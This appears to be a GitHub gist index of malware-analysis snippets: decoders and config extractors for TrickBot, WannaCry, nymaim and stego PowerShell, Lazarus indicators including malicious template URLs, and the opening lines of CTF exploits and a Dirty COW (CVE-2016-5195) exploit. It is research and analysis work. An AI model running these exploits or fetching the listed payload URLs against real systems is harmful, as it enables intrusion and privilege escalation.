Skip to content

Instantly share code, notes, and snippets.

@mak
mak / x.py
Created July 21, 2020 11:53
decode some powershell malware from image
ret = [ 0 for _ in range(40000)]
for i in range(26):
for j in range(800):
try:
px = img.getpixel((j,i))
except:
continue
ret[i * 800 + j ] = math.floor((px[2] & 0xf ) * 4 * 4 ) | (px[1]&0xf)
@mak
mak / ioc.txt
Created May 14, 2020 16:20
Lazarus camaping using @LockheedMartin, @BAESystemsplc, @Boeing as decoys
first stage documents:
LM_IFG_536R.docx.docx - 9724ee7a6baf421ac5a2a3c93d32e796e2a33d7d75bbfc02239fc9f4e3a41e0
Boeing_PMS.docx - a3eca35d14b0e020444186a5faaba5997994a47af08580521f808b1bb83d6063
Senior_Design_Engineer.docx - 49724ee7a6baf421ac5a2a3c93d32e796e2a33d7d75bbfc02239fc9f4e3a41e0
Boeing_DSS_SE.docx - 322aa22163954ff3ff017014e357b756942a2a762f1c55455c83fd594e844fdd
remote templates:
https://www.astedams.it/uploads/frame/61.dotm
https://www.astedams.it/uploads/template/17.dotm
@mak
mak / x.c
Created April 29, 2020 17:24
get_win_name
BOOL __cdecl get_win_name(int a1, _DWORD *a2)
{
BOOL result; // eax
bool v3; // zf
struct _OSVERSIONINFOA VersionInformation; // [esp+8h] [ebp-98h]
std::string::operator=(a1, "unknown Windows version");
*a2 = 0;
VersionInformation.dwOSVersionInfoSize = 148;
result = GetVersionExA(&VersionInformation);
@mak
mak / trick.py
Created May 16, 2019 19:23
Get config from unpacked trickbot
import re
import sys
import pefile
from mlib.crypto import xor
from mlib.malware import trickbot
from mlib.struct import udword
def find_cfg_params(data):
@mak
mak / x.js
Created March 27, 2019 11:45
exploit of plang chall from 0ctf2019
fun int2double(xint) { var i = 0 while(i< 1074) { xint = xint / 2 i = i + 1} return xint }
fun double2int(xd) { var i = 0 while(i< 1074) { xd = xd + xd i = i + 1} return xd }
fun shift(xint,x) { var i = 0 while(i<x) { xint = xint + xint i = i + 1} return xint }
var c = -30
var x = -114
var y = -115
var a = [101,1,1,1,1,1,1,1,1,1]
var b = [1011,2,"chuj",3,4]
@mak
mak / exp300.py
Created January 3, 2018 17:29
Exploit for 300 at 34c3ctf
import phun
class R(phun.Remote):
def menu(self):
self.read('4) free\n')
def cmd(self,nr,idx):
self.menu()
self.sendline(str(nr))
@mak
mak / wcr.py
Last active October 28, 2018 21:09
Extract everything from WannaCry
import re
import os,sys
import pefile
import struct
import zipfile
import hashlib
import StringIO
from Crypto import Random
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5,AES
@mak
mak / x.sh
Created March 7, 2017 12:19
one-liner to extract powershell command in recent nymaim's documnets
( olevba $document | grep ' = ' | \
sed -e's/&/+/g' -e's/NaN/None/g' -e's/ = [^A].*(\(A.*)\))/= \1/' -e 's/Array//' \
-e's/(/[/g' -e's/)/]/g' -e "s#\"\([^\"]*\)\"\([^\"]*\)\"#\"\1'\2#" | \
grep '\[\|\+'; \
echo 'print globals()[sorted(globals(),key=lambda x: type(globals()[x]) == str and len(globals()[x]))[-1]]'
) \
| python2 - | tr -d '^' | tr '[:upper:]' '[:lower:]'
@mak
mak / hdoc.py
Last active October 28, 2018 21:09
Extract payload from H-docs
#!/usr/bin/env python2
import os
import re
import sys
import math
import pefile
import struct
import hashlib
import argparse
from oletools import olevba
@mak
mak / naughtyc0w.c
Created October 22, 2016 20:48
exploit for CVE-2016-5195 nothing fancy
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/uio.h>
#include <sys/wait.h>